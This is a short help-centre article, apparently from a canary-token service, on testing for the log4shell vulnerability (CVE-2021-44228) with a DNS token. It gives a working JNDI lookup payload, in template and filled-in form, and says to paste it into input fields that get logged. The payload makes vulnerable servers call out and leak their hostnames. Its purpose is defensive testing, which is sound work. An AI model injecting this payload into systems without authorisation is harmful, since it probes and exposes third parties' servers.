Skip to main content

Search

Using a Canarytoken to help test for CVE-2021-44228 (log4j/log4shell)

You can use the DNS Canarytoken to help you test for CVE-2021-44228.

 

1) On your console, Click on "Add new Canarytoken"

CleanShot 2024-08-16 at 09.22.30@2x.png

2) Select the "DNS" token

CleanShot 2024-09-13 at 10.55.09@2x.png

 

3) Enter a memo for the token (like: Testing log4shell #1)

CleanShot 2024-09-13 at 10.57.48@2x.png

4) The server will generate a DNS based token for you. Copy this Token.

CleanShot 2024-09-13 at 10.58.25@2x.png

5) Place this copied token in the jndi:ldap string as follows:

${jndi:ldap://x${hostName}.L4J.INSERT-COPIED-STRING-HERE/a}

For example the updated string will look as follows:

${jndi:ldap://x${hostName}.L4J.v52p1gxtas0p238iu99vj9rpx.c7b9c059bd9a.o3n.io/a}

Place the resultant string into search boxes and fields that will be parsed by your logging libraries, and if one of them is vulnerable, you will receive a notification that includes the hostname of the vulnerable server.

 

Was this article helpful?
61 out of 79 found this helpful
Return to top